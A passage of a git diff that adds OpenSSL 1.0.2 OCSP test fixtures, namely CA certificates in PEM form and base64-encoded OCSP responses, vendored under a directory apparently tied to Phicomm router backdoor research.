+9DLJTlCDh6I0SD1PNXf82Ijq9n0ezkO21cJqfjhmY03n7jLvDyToKmf6
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND2_Issuer_Root.pem
new file mode 100644
index 0000000..14d35cf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND2_Issuer_Root.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0DCCArigAwIBAgIQIKTEf93f4cdTYwcTiHdgEjANBgkqhkiG9w0BAQUFADCB
+gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV
+BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xMTAxMDEwMDAw
+MDBaFw0zMDEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl
+YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P
+RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0
+aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0UCLi3LjkRv3
+UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI
+2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8
+Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp
++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+
+DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O
+nKVIrLsm9wIDAQABo0IwQDAdBgNVHQ4EFgQUC1jli8ZMFTekQKkwqSG+RzZaVv8w
+DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD
+ggEBAC/JxBwHO89hAgCx2SFRdXIDMLDEFh9sAIsQrK/xR9SuEDwMGvjUk2ysEDd8
+t6aDZK3N3w6HM503sMZ7OHKx8xoOo/lVem0DZgMXlUrxsXrfViEGQo+x06iF3u6X
+HWLrp+cxEmbDD6ZLLkGC9/3JG6gbr+48zuOcrigHoSybJMIPIyaDMouGDx8rEkYl
+Fo92kANr3ryqImhrjKGsKxE5pttwwn1y6TPn/CbxdFqR5p2ErPioBhlG5qfpqjQi
+pKGfeq23sqSaM4hxAjwu1nqyH6LKwN0vEJT9s4yEIHlG1QXUEOTS22RPuFvuG8Ug
+R1uUq27UlTMdphVx8fiUylQ5PsE=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND3_Issuer_Root.pem
new file mode 100644
index 0000000..ba7fb8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND3_Issuer_Root.pem
@@ -0,0 +1,25 @@
+-----BEGIN CERTIFICATE-----
+MIIENjCCAx6gAwIBAgIBATANBgkqhkiG9w0BAQUFADBvMQswCQYDVQQGEwJTRTEU
+MBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4dGVybmFs
+IFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
+MB4XDTAwMDUzMDEwNDgzOFoXDTIwMDUzMDEwNDgzOFowbzELMAkGA1UEBhMCU0Ux
+FDASBgNVBAoTC0FkZFRydXN0IEFCMSYwJAYDVQQLEx1BZGRUcnVzdCBFeHRlcm5h
+bCBUVFAgTmV0d29yazEiMCAGA1UEAxMZQWRkVHJ1c3QgRXh0ZXJuYWwgQ0EgUm9v
+dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALj3GjPm8gAELTngTlvt
+H7xsD821+iO2zt6bETOXpClMfZOfvUq8k+0DGuOPz+VtUFrWlymUWoCwSXrbLpX9
+uMq/NzgtHj6RQa1wVsfwTz/oMp50ysiQVOnGXw94nZpAPA6sYapeFI+eh6FqUNzX
+mk6vBbOmcZSccbNQYArHE504B4YCqOmoaSYYkKtMsE8jqzpPhNjfzp/haW+710LX
+a0Tkx63ubUFfclpxCDezeWWkWaCUN/cALw3CknLa0Dhy2xSoRcRdKn23tNbE7qzN
+E0S3ySvdQwAl+mG5aWpYIxG3pzOPVnVZ9c0p10a3CitlttNCbxWyuHv77+ldU9U0
+WicCAwEAAaOB3DCB2TAdBgNVHQ4EFgQUrb2YejS0Jvf6xCZU7wO94CTLVBowCwYD
+VR0PBAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wgZkGA1UdIwSBkTCBjoAUrb2YejS0
+Jvf6xCZU7wO94CTLVBqhc6RxMG8xCzAJBgNVBAYTAlNFMRQwEgYDVQQKEwtBZGRU
+cnVzdCBBQjEmMCQGA1UECxMdQWRkVHJ1c3QgRXh0ZXJuYWwgVFRQIE5ldHdvcmsx
+IjAgBgNVBAMTGUFkZFRydXN0IEV4dGVybmFsIENBIFJvb3SCAQEwDQYJKoZIhvcN
+AQEFBQADggEBALCb4IUlwtYj4g+WBpKdQZic2YR5gdkeWxQHIzZlj7DYd7usQWxH
+YINRsPkyPef89iYTx4AWpb9a/IfPeHmJIZriTAcKhjW88t5RxNKWt9x+Tu5w/Rw5
+6wwCURQtjr0W4MHfRnXnJK3s9EK0hZNwEGe6nQY1ShjTK3rMUUKhemPR5ruhxSvC
+Nr4TDea9Y355e6cJDUCrat2PisP29owaQgVR1EX1n6diIWgVIEM8med8vSTYqZEX
+c4g/VhsxOBi0cQ+azcgOno4uG+GMmIPLHzHxREzGBHNJdmAPx/i9F4BrLunMTA5a
+mnkPIAou1Z5jJh5VkpTYghdae9C8x49OhgQ=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D1.ors
new file mode 100644
index 0000000..6589782
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBRg2uQDFpGg
+Ywh4P1y2H9bZ2/BQNBgPMjAxMjEwMTExMTI1MjJaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDExMTAwMDAwWqARGA8yMDEyMTAxODEw
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQAHQBPHdHWNzaFs5bfBvQcvxBWsDnsCFXNs
+a1fECiWDFNt6Nz4MCBY4rC7n0nhQfvg4m1woNcTAZVO8lacYomwUU/5/XpeFM6yc
+NeFcVbfVXA48GWPANitNQCwyRL5hGfIqNy1I9T1BHlBqYusmJKy65r2iqpmld/hD
+7S1dsCd4fXhjBQQORPmBqhKvWEU08Dh5aoaDAuaZoxRH8B1q+mUs0ODOIu34L84y
+JcxTKccd/HCwI8oxwLoBtyXSHb+dCzc7zSjFvQhbT5dOCvJNNe/fk6+EhMtQ6ybC
+D7p9EShCvU5jAdw54bZWk5wIQSvsWk9axUmYFFLYI3hAaoybpFVroIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRISdENsrz1CSWG3VIBwfQERQwDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDA1MFoXDTEyMTIxOTA4NDA1MFowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDIxFzAVBgNV
+BAUTDjIwMTIwOTE5MDk0MDAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAnCgMsBO+IxIqCnXCOfXJoIC3wj+f0s4DV9h2gJBzisWXkaJD2DfNrd0kHUXK
+qVVPUxnA4G5iZu0Z385/KiOt1/P6vQ/Z2/AsEh/8Z/hIyeZCHL31wrSZW4yLeZwi
+M76wPiBHJxPun681HQlVs/OGKSHnbHc1XJAIeA/M8u+lLWqIKB+AJ82TrOqUMj1s
+LjGhQNs84xPliONN5K7DrEy+Y65X/rFxN77Smw+UtcH1GgH2NgaHH8dpt1m25sgm
+UxZWhdx66opB/lbRQwWdGt7MC0kJFaWHDZq64DTuYoekFYSxAFu0nd0EekEHEJEi
+9mquB9cv/96SuEJl8BcUWU/1LwIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFF/a5AMWkaBjCHg/XLYf1tnb8FA0MB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCKRl1iXFmOQtLseDWP
+Y5icDDBGiRi17CGgvIzGJi/ha0PhbO+X0TmQIEnRX3Mu0Er/Mm4RZSjMtJ2iZRh3
+tGf4Dn+jKgKOmgXC3oOG/l8RPHLf0yaPSdn/z0TXtA30vTFBLlFeWnhbfhovea4+
+snPdBxLqWZdtxmiwojgqA7YATCWwavizrBr09YRyDwzgtpZ2BwMruGuFuV9FsEwL
+PCM53yFlrM32oFghyfyE5kYjgnnueKM+pw1kA0jgb1CnVJRrMEN1TXuXDAZLtHKG
+5X/drah1JtkoZhCzxzZ3bYdVDQJ90OHFqM58lwGD6z3XuPKrHDKZKt+CPIsl5g7p
+4J2l
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D2.ors
new file mode 100644
index 0000000..4e11e4b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D2.ors
@@ -0,0 +1,32 @@
+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
+fBIRKjnK621vAWvc7UR+0hqnZ+U=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D3.ors
new file mode 100644
index 0000000..61e2d09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAlVTMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMTEzMjE0MVowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTExMjQyMTZaoBEYDzIwMTIxMDEzMTMyMTQxWjAN
+BgkqhkiG9w0BAQUFAAOCAQEAEWd9kKEfaurOXDV98OVtU27TmK4L4MeGEPdkg1i+
+fbPMe1mouWlVm23W6yaM7mM2NMXLW+hTNzqfyMPM7rByXNaFAAniCPTXNO3eJRIA
+Zf0F10OSdBQ/ln4igHQCVZCnXR30/aP5/PMb4u3/LTuC9aW6K7mLXcuCvJztGnXO
+v3r64q/qTGG/b4eS65exykV9riSFuGp1rzLAy5fSYTBWTOBQ679PFjQnL60GkrZA
+Egtxw2ozEDwo+X0WamEouxN8mjX/VQlMdEbykUFDuPD3vZydZ04BV9f18RJZOU9j
+gCwMzd9gb4jUL4ykdWiLmO+YPDWFyNSYEIfnGgk1VvPHuaCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND1.ors
new file mode 100644
index 0000000..b6fadc5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND1.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBSJRFH/UCpp
+Xi2I9CG62QzyzsvqfBgPMjAxMjEwMTEwODQxMTNaMHMwcTBJMAkGBSsOAwIaBQAE
+FEi2DTgjjfhFbk7lhD6jlBEYApefBBSIRFH/UCppXi2I9CG62QzyzsvqfAIQIuEz
+IiCgSN8psr+aMcKbB4AAGA8yMDEyMTAxMTA4NDExM1qgERgPMjAxMjEwMTUwODQx
+MTNaMA0GCSqGSIb3DQEBBQUAA4IBAQCNnhlBMxxh9z5AKfzAxiKs90CfxUsqfYfk
+8XlyF9VIfWRfEwzS6MF1pEzLnghRxTAmjrFgK+sxD9wk+S5Mdgw3nbED9DVFH2Hs
+RGKm/t9wkvrYOX6yRQqw6uRvU/5cibMjcyzKB/VQMwk4p4FwSUgBv88A5sTkKr2V
+eYdEm34hg2TZVkipPMBiyTyBLXs8D/9oALtnczg4xlTRSjDUvqoXL5haqY4QK2Pv
+mNwna6ACkwLmSuMe29UQ8IX2PUB4R5Etni5czyiKGxZLm+4NAhuEwWFNEzCyImPc
+087gHGU1zx+qVSlajqMJ/9ZXYjbt7WiWdhOTGEv4VMn8dHhRUs32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND2.ors
new file mode 100644
index 0000000..251f0df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND2.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBQMWOWLxkwV
+N6RAqTCpIb5HNlpW/xgPMjAxMjEwMTAyMzAzMTlaMHMwcTBJMAkGBSsOAwIaBQAE
+FOy+ZAvtiWulchtVZmfKU1ZI9ewTBBQLWOWLxkwVN6RAqTCpIb5HNlpW/wIQEaO0
+0OyNt3+doM1dLVEvQoAAGA8yMDEyMTAxMDIzMDMxOVqgERgPMjAxMjEwMTQyMzAz
+MTlaMA0GCSqGSIb3DQEBBQUAA4IBAQCHn2nGfEUX/EJruMkTgh7GgB0u9cpAepaD
+sPv9gtl3KLUZyR+NbGMIa5/bpoJp0yg1z5VL6CLMusy3AF6Cn2fyaioDxG+yc+gA
+PcPFdEqiIMr+TP8s7qcEiE6WZddSSCqCn90VZSCWkpDhnCjDRwJLBBPU3803fdMz
+oguvyr7y6Koxik8X/iUe8EpSzAvmm4GZL3veTI+x7IezJSrhCS9zM0ZHjySjoDxC
++ljGH0EuWPTmFEqZVGIq3cuahIYzKItUbYnXU6ipi/2p42qbsFeok7eEN0EYsY1a
+vRATHGRmU7Q5HLCq4rQtZC1cis52Mvc9x1W4z/Gt5A3FtgElXXNA
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND3.ors
new file mode 100644
index 0000000..19641f5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND3.ors
@@ -0,0 +1,10 @@
+MIIB1AoBAKCCAc0wggHJBgkrBgEFBQcwAQEEggG6MIIBtjCBn6IWBBSuvZh6NLQm
+9/rEJlTvA73gJMtUGhgPMjAxMjEwMTAxMzA3NDZaMHQwcjBKMAkGBSsOAwIaBQAE
+FHyxZlScq9tE7mImFq30ZXv3etWUBBStvZh6NLQm9/rEJlTvA73gJMtUGgIRAKcN
+bJWejX5BTb8DmevkCauAABgPMjAxMjEwMTAxMzA3NDZaoBEYDzIwMTIxMDE0MTMw
+NzQ2WjANBgkqhkiG9w0BAQUFAAOCAQEAA70+GYJoFuUBwIN9KHMqmOOtnmoLBBlm
+HL2Su70ZEqSmL4zTt3iHY3m2YaNYSPphgDlQ4lY8zGAkCSrZ3ulpJun3RRy+gD29
+0ks155tChMbYNZrFm46vKWabBjh2p+623daymlcbgizi5Z+P4oJL68VrOqh+DArE
+MpHH16BTGaF+bAjzTRSbS90xUReqwnnEpRBrmcQVo4uKpSkbyrx7iMLqsJ2vGpgh
+xqj1kNPT9g3+gegmdU9QpFV0l9ZV8X/f0uz5nT4I0NL81d/KDHGx2rd+bftLODeL
+ZAWAzFbr5B5EMqPGoh/SQXpcuVOqMHjh8fi8PBXBcitlIFzdDKXDvA==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D1_Issuer_ICA.pem
new file mode 100644
index 0000000..3f1c053
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D1_Issuer_ICA.pem
@@ -0,0 +1,27 @@
+-----BEGIN CERTIFICATE-----
+MIIEhjCCA26gAwIBAgILBAAAAAABL07hXdQwDQYJKoZIhvcNAQEFBQAwTDEgMB4G
+A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjIxEzARBgNVBAoTCkdsb2JhbFNp
+Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTEwNDEzMTAwMDAwWhcNMjIwNDEz
+MTAwMDAwWjBZMQswCQYDVQQGEwJVUzEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1z
+YTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBFeHRlbmRlZCBWYWxpZGF0aW9uIENBIC0g
+RzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoUbMUpq4pbR/WNnN
+2EugcgyXW6aIIMO5PUbc0FxSMPb6WU+FX7DbiLSpXysjSKyr9ZJ4FLYyD/tcaoVb
+AJDgu2X1WvlPZ37HbCnsk8ArysRe2LDb1r4/mwvAj6ldrvcAAqT8umYROHf+IyAl
+VRDFvYK5TLFoxuJwe4NcE2fBofN8C6iZmtDimyUxyCuNQPZSY7GgrVou9Xk2bTUs
+Dt0F5NDiB0i3KF4r1VjVbNAMoQFGAVqPxq9kx1UBXeHRxmxQJaAFrQCrDI1la93r
+wnJUyQ88ABeHIu/buYZ4FlGud9mmKE3zWI2DZ7k0JZscUYBR84OSaqOuR5rW5Isb
+wO2xAgMBAAGjggFaMIIBVjAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB
+/wIBADAdBgNVHQ4EFgQUsLBK/Rx1KPgcYaoT9vrBkD1rFqMwRwYDVR0gBEAwPjA8
+BgRVHSAAMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vd3d3Lmdsb2JhbHNpZ24uY29t
+L3JlcG9zaXRvcnkvMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFs
+c2lnbi5uZXQvcm9vdC1yMi5jcmwwRAYIKwYBBQUHAQEEODA2MDQGCCsGAQUFBzAB
+hihodHRwOi8vb2NzcC5nbG9iYWxzaWduLmNvbS9FeHRlbmRlZFNTTENBMCkGA1Ud
+JQQiMCAGCCsGAQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNwoDAzAfBgNVHSMEGDAW
+gBSb4gdXZxwewGoG3lm0mi3f3BmGLjANBgkqhkiG9w0BAQUFAAOCAQEAL0m28rZa
+pJWrnlrpK4KbzJBrfHRFIOde2Mcj7ig1sTVlKqVR4FU/9oNntOQ2KbDa7JeVqYoF
+o0X+Iy5SiLQfEICt0oufo1+oxetz3nmIQZgz7qdgGLFGyUAQB5yPClLJExoGbqCb
+LTr2rk/no1E1KlsYBRLlUdy2NmLz4aQP++TPw5S/EauhWTEB8MxT7I9j12yW00gq
+iiPtRVaoZkHqAblH7qFHDBTxI+Egc8p9UHxkOFejj0qcm+ltRc9Ea01gIEBxJbVG
+qmwIft/I+shWKpLLg7h5CZctXqEBzgbttJfJBNxB7+BPNk3kQHNG7BESfIhbNCYl
+TercGL7FG81kwA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D2_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D2_Issuer_Root.pem
new file mode 100644
index 0000000..af1b8b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D2_Issuer_Root.pem
@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
